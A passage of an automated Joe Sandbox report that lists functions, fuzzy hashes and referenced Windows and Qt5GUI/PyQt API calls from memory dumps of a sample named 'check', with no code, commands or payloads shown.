                                                                                                                                                                                                                                          • Opcode ID: 86499e9bba0c4ed648148fd48ae9e774b92d88f4eeb73ba31b039138d095e21b
                                                                                                                                                                                                                                          • Instruction ID: 430ad16e405a70182effbe9aed0fc1548e25dab689ca535a976687b35e66265c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86499e9bba0c4ed648148fd48ae9e774b92d88f4eeb73ba31b039138d095e21b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F012136A08B46C1EB109F51E8496A933A4FB40FD4F914032D99E07330EF7CE65AC384
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                                          • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction ID: 6cd900eea8c9c0958a777e5466238cdc2cb603c066f16d74dbd2e8e991d731ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD118222F6CE0301FA643965E4D237D9070BF59370FC806B4EA6E172D68EEC684EC121
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B3AF
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B3CE
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B3F6
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B407
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B418
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                          • Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                          • Instruction ID: dc7a55f717b2a8568f3d506291374d109cfee97a9748e077d973c59abc632cd1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67117220F08E0281F958BF265DD1579E1425F547B0FD843B4D97E466C6FDACB509C324
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: List_$Size$ItemLongLong_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1144519416-0
                                                                                                                                                                                                                                          • Opcode ID: 87c7589c3d866cc5d2d0eb5da0fb8451543ff253408e77ed3a235263022f7c2c
                                                                                                                                                                                                                                          • Instruction ID: 4d8b3f27f228db2abce7426da8eaaf295192384491d8047e3ffaa54e31f29af7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87c7589c3d866cc5d2d0eb5da0fb8451543ff253408e77ed3a235263022f7c2c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3018E22B0A64182EA649F65B9552396390AB45FE0F845230EAAF47B94EF7CF0568308
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                          • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                          • Instruction ID: a1f6f64578c3d196d9c62492bc27b93304a4d321c4e7acbd6990fec3e152a8b3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7581C473D0CA0387F7657F2599D0278B6A0AB11B64FD540B5CA0D97285EFACE80AD339
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Pixmap@@$?drawEngine@@F@@@PaintPixmap@PointRectTiledV0@@
                                                                                                                                                                                                                                          • String ID: NNN$drawTiledPixmap
                                                                                                                                                                                                                                          • API String ID: 245502091-3720221948
                                                                                                                                                                                                                                          • Opcode ID: 9faed997e513f28e10e05add6e84ed866baaedcca9dd1c7a4b6e2d2c0b1d922c
                                                                                                                                                                                                                                          • Instruction ID: 9f9d4cb23e651a72cd37be199ef6b77d127fa5cd96e9690a0044492f4867dc47
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9faed997e513f28e10e05add6e84ed866baaedcca9dd1c7a4b6e2d2c0b1d922c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76411823A09B8586E7618B15F8017AAB3A4FB98BC4F444235DECD17765EF3CE0A5D704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??0QDoubleValidator@@QEAA@PEAVQObject@@@Z.QT5GUI ref: 00007FF89D933E23
                                                                                                                                                                                                                                          • ??0QDoubleValidator@@QEAA@NNHPEAVQObject@@@Z.QT5GUI ref: 00007FF89D933EED
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DoubleObject@@@Validator@@$malloc
                                                                                                                                                                                                                                          • String ID: ddi|JH$|JH
                                                                                                                                                                                                                                          • API String ID: 1549773057-403693801
                                                                                                                                                                                                                                          • Opcode ID: ba7b633dccbe7817b880e2332ae92c600f49a849b9eaed363084f56f822b1c02
                                                                                                                                                                                                                                          • Instruction ID: 428b6f141812cddf9e6a27e10a485a9d922a999c572b90a739a16d2d559396cb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba7b633dccbe7817b880e2332ae92c600f49a849b9eaed363084f56f822b1c02
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F41D237608B8185DB608F12E84469AB3A8FB48BD0F554136EACE47B28EF3DE555C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?headerData@ItemModel@@Orientation@Qt@@Standard
                                                                                                                                                                                                                                          • String ID: headerData$iFi
                                                                                                                                                                                                                                          • API String ID: 4080222492-2305688570
                                                                                                                                                                                                                                          • Opcode ID: ee2094dcb450bf19ebb0fd0d8320244bed4a64bc93ce194b3a99d892fbc7f532
                                                                                                                                                                                                                                          • Instruction ID: 3bc560027eec479776a9ff2f899d280da82efc7cd6a02781cd82d8c06a8496b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee2094dcb450bf19ebb0fd0d8320244bed4a64bc93ce194b3a99d892fbc7f532
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E31F677608B8186EB208F16F84096977A4F798FD4F544136EE8E53724EF3CE5558B08
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?supportedDropActions@QStandardItemModel@@UEBA?AV?$QFlags@W4DropAction@Qt@@@@XZ.QT5GUI ref: 00007FF89D94DFAD
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Drop$?supportedAction@Actions@Flags@ItemModel@@Qt@@@@Standard
                                                                                                                                                                                                                                          • String ID: QStandardItemModel$supportedDropActions$supportedDropActions(self) -> Qt.DropActions
                                                                                                                                                                                                                                          • API String ID: 3056417493-3909675295
                                                                                                                                                                                                                                          • Opcode ID: 00897672ea61c64aa3b8010748fc64b2dfa37b0e8d84fb3642155b0ffb5e8df6
                                                                                                                                                                                                                                          • Instruction ID: a1769b7028a403f7c5125ab4a3dbd6a412a5d5a5d65f5f4667d1492bb51eb2a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00897672ea61c64aa3b8010748fc64b2dfa37b0e8d84fb3642155b0ffb5e8df6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5214C37618A4685EB608F15E4542A963A0FF84FD0F444032EA8E47765FF3CF454C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FromLongLong_Unsigned
                                                                                                                                                                                                                                          • String ID: QRgba64$toArgb32$toArgb32(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3417993445-1311793961
                                                                                                                                                                                                                                          • Opcode ID: 20737046f268b2d1439ce2a7b26e32925274722b1f57032fed5370e11678979c
                                                                                                                                                                                                                                          • Instruction ID: dd0dcbd2b6ea1fd61acbb64001bc1707ff83620847c7c79355e09f7202a76bb2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20737046f268b2d1439ce2a7b26e32925274722b1f57032fed5370e11678979c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16217577B14B8A82EF208B95D8467B923A4FB54FD0F914432DA8E07765DE7CE245C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLongPalette@@V0@@
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 2256276294-2407233842
                                                                                                                                                                                                                                          • Opcode ID: 91527a5669e0e785ec8e892bf14fdca3b2671f552bc7a3f8aa753c9c092ce01b
                                                                                                                                                                                                                                          • Instruction ID: e680c6316a99d67a85ec1a20c52944f791bba5fcce3a24d1d8827132ad4aca57
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91527a5669e0e785ec8e892bf14fdca3b2671f552bc7a3f8aa753c9c092ce01b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E221DC37A09B4282EA608F55F45516AB3B0FB88FD4F444532EE8E03B68EF7DE5558704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromItem@@LongStandardV0@@
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 709210250-2407233842
                                                                                                                                                                                                                                          • Opcode ID: c3cf89d32234f65ad9cb8b1ac91d7a74de0947322eaa4eac3e4b6056b424d204
                                                                                                                                                                                                                                          • Instruction ID: 2a622f7886f76ab5d934d2a129db111da75fe60ba3d78c2b123598c284667d36
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3cf89d32234f65ad9cb8b1ac91d7a74de0947322eaa4eac3e4b6056b424d204
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36210E37A09B52C1EA608F55F44516AB3A4FB94FD8F444432EE8E03B68EF3CE5558704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLength@@LongTextV0@@
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 810943551-2407233842
                                                                                                                                                                                                                                          • Opcode ID: 4dbd24ba209c308fef6e0480f9edff2d3a8ef717e8d27e532fa6dcf453951cc1
                                                                                                                                                                                                                                          • Instruction ID: 2d2058dfe42ab8b6418195d4670b9b239ad93460e1030ac4ae3f3631e4148b7c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dbd24ba209c308fef6e0480f9edff2d3a8ef717e8d27e532fa6dcf453951cc1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47210E37A09B4292EB609B56F448169A3A4FB84FD4F444532EEDE03B68EF3CE155C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLongTransform@@V0@@
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 2878255223-2407233842
                                                                                                                                                                                                                                          • Opcode ID: 755035988fd54153b3eaa76621a35a8def6c76b6d861519c82964da188a25547
                                                                                                                                                                                                                                          • Instruction ID: 875509b95ad1b6e21176e2ffa658103c63a91b2fa9b868aaad44bf3a202b7006
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 755035988fd54153b3eaa76621a35a8def6c76b6d861519c82964da188a25547
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF21EB37A09B4281EA608F55F444269A7A4FB84FD4F444532EECE13B68EF3CE5558708
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_Cursor@@FromLongTextV0@@
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 4057910976-2407233842
                                                                                                                                                                                                                                          • Opcode ID: 830e89769418c5288e5463c1d1b809e18fc441aa69d7688d2c26d999c9b12e46
                                                                                                                                                                                                                                          • Instruction ID: dc2b59c87c1c973b9f5e71a9fe43bbb71336147c98a3b4f91b79399d5d0f1709
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 830e89769418c5288e5463c1d1b809e18fc441aa69d7688d2c26d999c9b12e46
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B421FC37A09B82C1EA608F15F444269B3A4FB85FD4F444132EE9E13B68EF3DE5558708
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?transform@QPainter@@QEBAAEBVQTransform@@XZ.QT5GUI ref: 00007FF89D9B5DBD
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?transform@Painter@@Transform@@malloc
                                                                                                                                                                                                                                          • String ID: QPainter$transform$transform(self) -> QTransform
                                                                                                                                                                                                                                          • API String ID: 1370134044-2175011912
                                                                                                                                                                                                                                          • Opcode ID: 5c4a5376b03b21d7c30a09f3d78ca9579a0516dca88fd0563647297cd22fb53f
                                                                                                                                                                                                                                          • Instruction ID: 08fa06b2caf68ebbf0806a3deef1c4baebf7fad821cf17e86dc0bace38a7d0a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c4a5376b03b21d7c30a09f3d78ca9579a0516dca88fd0563647297cd22fb53f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D121FB27D18F8682E710CF25D8456A937A4FB98F88F459231DE8E13226EF78E194C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?deviceTransform@QPainter@@QEBAAEBVQTransform@@XZ.QT5GUI ref: 00007FF89D9B603D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?devicePainter@@Transform@Transform@@malloc
                                                                                                                                                                                                                                          • String ID: QPainter$deviceTransform$deviceTransform(self) -> QTransform
                                                                                                                                                                                                                                          • API String ID: 890717423-3406826843
                                                                                                                                                                                                                                          • Opcode ID: a9565c0b6cccddcf90ea89c2875636ae50c3d88ee437b637d27d99c94913b851
                                                                                                                                                                                                                                          • Instruction ID: bfe987827e94c2478ba91654c55b4b414d63ed789850fc7cea24fb7e2ecb8cee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9565c0b6cccddcf90ea89c2875636ae50c3d88ee437b637d27d99c94913b851
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3521FB27E18F8682E710CF25D8456A937A4FB99B84F459232DE8E17226EF78F194C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?rect@QPageSize@@QEBA?AVQRectF@@W4Unit@1@@Z.QT5GUI ref: 00007FF89D9BFE00
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?rect@PageRectSize@@Unit@1@@malloc
                                                                                                                                                                                                                                          • String ID: QPageSize$rect$rect(self, units: QPageSize.Unit) -> QRectF
                                                                                                                                                                                                                                          • API String ID: 1657382084-3066035369
                                                                                                                                                                                                                                          • Opcode ID: a12d05f3afcd6f10cb9ba8b48ed37eece711a6252fd571d54d754faaf629417b
                                                                                                                                                                                                                                          • Instruction ID: 903814147337e989440cb97acce8b6dceda55a81d08c94f2fdde208e675384e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a12d05f3afcd6f10cb9ba8b48ed37eece711a6252fd571d54d754faaf629417b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23110737A18B46C6EB209F11E8896A933A5FB48FC4F914032CA9E47320EF3DE559C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?property@QTextFormat@@QEBA?AVQVariant@@H@Z.QT5GUI ref: 00007FF89D997DD6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?property@Format@@TextVariant@@malloc
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$fontFamilies$fontFamilies(self) -> Any
                                                                                                                                                                                                                                          • API String ID: 3525565995-3369884772
                                                                                                                                                                                                                                          • Opcode ID: 95f19b7097581816a65226e7bc2a5f0f0ae451d5a6b1e725866857803429f6ea
                                                                                                                                                                                                                                          • Instruction ID: e48e982433b2367f6eb869959386e5a9e1b36ddcce62a0fc16b4683a8a5c2060
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95f19b7097581816a65226e7bc2a5f0f0ae451d5a6b1e725866857803429f6ea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05113A37A08A4681EB10DF51E8496A933A4FB84FD4F814032DE8E07320EF7DE555C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?brushProperty@QTextFormat@@QEBA?AVQBrush@@H@Z.QT5GUI ref: 00007FF89D965DA6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?brushBrush@@Format@@Property@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextTableCellFormat$rightBorderBrush$rightBorderBrush(self) -> QBrush
                                                                                                                                                                                                                                          • API String ID: 2621215938-1058665623
                                                                                                                                                                                                                                          • Opcode ID: 6ff83208159848bf7cf03c709aec2ea19b9a0dbe62eb37307e0ce6d180c27aec
                                                                                                                                                                                                                                          • Instruction ID: 634dc65bcad37e954106c578d4f379f76bcaaedefcd471bc24bd70c7dd7c9cbd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ff83208159848bf7cf03c709aec2ea19b9a0dbe62eb37307e0ce6d180c27aec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4113A77A18B8681EB109F11E8496A933A4FB48FD0F914032DA8E07720EF7CE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?lengthProperty@QTextFormat@@QEBA?AVQTextLength@@H@Z.QT5GUI ref: 00007FF89D970016
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?lengthFormat@@Length@@Property@malloc
                                                                                                                                                                                                                                          • String ID: QTextFrameFormat$height$height(self) -> QTextLength
                                                                                                                                                                                                                                          • API String ID: 104013036-3396500128
                                                                                                                                                                                                                                          • Opcode ID: 47afd2b8877be0bd4079d4800e986640a8a1b38b8990d5d2fa147a83c06d4e55
                                                                                                                                                                                                                                          • Instruction ID: bfff335a83d1e5f6c4cf632782ec5bc780f79502e76047abf646fa7dd6114aef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47afd2b8877be0bd4079d4800e986640a8a1b38b8990d5d2fa147a83c06d4e55
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8113A77A08A86C1EB109F12E8496A933A4FB44FD0F958032DE8E47320EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
